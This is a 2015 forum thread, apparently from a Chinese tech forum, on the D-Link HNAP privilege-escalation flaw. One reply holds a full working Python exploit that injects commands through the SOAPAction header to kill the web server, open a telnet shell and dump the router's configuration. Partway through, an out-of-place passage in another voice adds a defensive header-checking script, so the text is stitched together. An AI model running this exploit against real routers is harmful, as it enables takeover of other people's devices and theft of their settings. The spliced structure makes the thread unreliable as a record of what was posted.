Vulnerability exposed across major wireless router brands

    davidyin · Jun 3, 2015 · 4446 views
    HNAP Privilege Escalation Vulnerability
    Check whether updated firmware has been released for your router.

    Going to update my D-Link Dir-850L first.
    7 replies    2015-06-03 14:39:32 +08:00
    lhbc · 1 · Jun 3, 2015 via Android
    Domestic ones all have backdoors, no need to check...
    princeofwales · 2 · Jun 3, 2015
    Will Netgear have problems? It's American.
    I'm just afraid of domestic ones; no matter how cheap, I don't want to buy them.
    lee015 · 3 · Jun 3, 2015 via Android
    Would there still be problems after flashing open-source firmware?
    ledzep2 · 4 · Jun 3, 2015
    China Telecom and China Unicom don't even give you a public IP these days; even if you wanted to access it you couldn't find it. Time to wash up and go to bed...
    Karblue · 5 · Jun 3, 2015
    Isn't it only D-Link that's affected? Domestic vendors don't seem to have been caught in the crossfire.
    Karblue · 6 · Jun 3, 2015
    #!/usr/bin/env python

    import sys
    import urllib2
    import httplib

    try:
        ip_port = sys.argv[1].split(':')
        ip = ip_port[0]

        if len(ip_port) == 2:
            port = ip_port[1]
        elif len(ip_port) == 1:
            port = "80"
        else:
            raise IndexError
    except IndexError:
        print "Usage: %s <target ip:port>" % sys.argv[0]
        sys.exit(1)

    url = "http://%s:%s/HNAP1" % (ip, port)
    # NOTE: If exploiting from the LAN, telnetd can be started on
    # any port; killing the http server and re-using its port
    # is not necessary.
    #
    # Killing off all hung hnap processes ensures that we can
    # re-start httpd later.
    command = "killall httpd; killall hnap; telnetd -p %s" % port
    headers = {
        "SOAPAction" : '"http://purenetworks.com/HNAP1/GetDeviceSettings/`%s`"' % command,
    }

    req = urllib2.Request(url, None, headers)
    try:
        urllib2.urlopen(req)
        raise Exception("Unexpected response")
    except httplib.BadStatusLine:
        print "Exploit sent, try telnetting to %s:%s!" % (ip, port)
        print "To dump all system settings, run (no quotes): 'xmldbc -d /var/config.xml; cat /var/config.xml'"
        sys.exit(0)
    except Exception:
        print "Received an unexpected response from the server; exploit probably failed. :("



    PoC here. Reposted from the great devttys0.
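An added defensive example, not code from the thread or from devttys0: a small Python 3 checker that parses raw HTTP requests and flags HNAP calls whose SOAPAction header carries anything beyond a single method URI, which is how the injection used by the PoC above looks on the wire. The sample requests and the 192.168.0.1 address are constructed for the example, not captured device traffic.

```python
import re

# A legitimate HNAP SOAPAction is a (usually quoted) URI naming exactly one method.
LEGIT_ACTION = re.compile(r'^"?http://purenetworks\.com/HNAP1/[A-Za-z0-9_]+"?$')
# Shell metacharacters that never belong in a method URI.
SHELL_META = re.compile(r"[`;|&$]")


def parse_request(raw):
    """Split a raw HTTP request into (path, headers) with lower-cased header names."""
    lines = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    parts = lines[0].split(" ")
    path = parts[1] if len(parts) > 1 else ""
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return path, headers


def classify_request(raw):
    """Return 'not-hnap', 'benign', 'suspicious' or 'malformed' for one raw request."""
    path, headers = parse_request(raw)
    if not path.startswith("/HNAP1"):
        return "not-hnap"
    action = headers.get("soapaction", "")
    if action == "" or LEGIT_ACTION.match(action):
        return "benign"      # bare /HNAP1 discovery request, or a clean method URI
    if SHELL_META.search(action):
        return "suspicious"  # shell syntax after the method name: injection attempt
    return "malformed"       # not a method URI at all; worth a look, but no shell syntax


# Constructed sample requests (not captured device traffic).
SAMPLES = {
    "benign": ("POST /HNAP1/ HTTP/1.1\r\nHost: 192.168.0.1\r\n"
               'SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings"\r\n\r\n'),
    "injected": ("POST /HNAP1 HTTP/1.1\r\nHost: 192.168.0.1\r\n"
                 'SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings/`id`"\r\n\r\n'),
    "other": "GET /index.html HTTP/1.1\r\nHost: 192.168.0.1\r\n\r\n",
}


def scan(requests):
    """Classify every request in a {name: raw} dict; returns {name: verdict}."""
    return {name: classify_request(raw) for name, raw in requests.items()}
```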
    Karblue · 7 · Jun 3, 2015
    Also found devttys0's rant about D-Link's patch. Took a look, and the damn patch really is sloppy.
    http://www.devttys0.com/2015/04/what-the-ridiculous-fuck-d-link/